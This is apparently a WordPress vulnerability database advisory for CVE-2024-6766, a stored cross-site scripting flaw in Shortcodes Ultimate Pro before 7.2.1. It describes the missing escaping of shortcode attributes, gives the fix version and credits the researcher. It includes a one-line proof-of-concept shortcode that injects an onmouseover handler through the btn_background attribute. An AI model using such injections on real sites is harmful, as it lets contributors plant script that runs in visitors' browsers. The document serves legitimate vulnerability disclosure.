Shortcodes Ultimate Pro < 7.2.1 – Contributor+ Stored XSS | CVE 2024-6766 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

Proof of Concept

[su_plan name="1" price="1" before="1" after="1" period="1" background="1" color="1" icon_color="1" icon_size="128" btn_url="1" btn_text="1" btn_background='123"onmouseover="alert(1)//"' btn_color="1" class="1"]1[/su_plan]

Affects Plugins

shortcodes-ultimate-pro

Fixed in 7.2.1

References

CVE

URL

https://research.cleantalk.org/cve-2024-6766/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://www.linkedin.com/in/dmitriy-ignatyev-8a9189267/

Verified

Yes

WPVDB ID

77bb1dcf-4e84-497a-955e-f3c0b649ad1c

Timeline

Publicly Published

2024-07-16 (about 1 year ago)

Added

2024-07-16 (about 1 year ago)

Last Updated

2024-07-16 (about 1 year ago)

Other

Published

Title

Published

2023-05-15

Title

WooCommerce Composite Products < 8.7.6 - Reflected XSS

Published

2025-06-12

Title

Noptin < 4.0.0 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2024-09-23

Title

Seriously Simple Stats < 1.7.0 - Reflected Cross-Site Scripting

Published

2024-12-23

Title

Email Subscribers < 5.7.45 - Admin+ Stored XSS

Published

2025-03-24

Title

WP Church Donation <= 1.7 - Unauthenticated Stored Cross-Site Scripting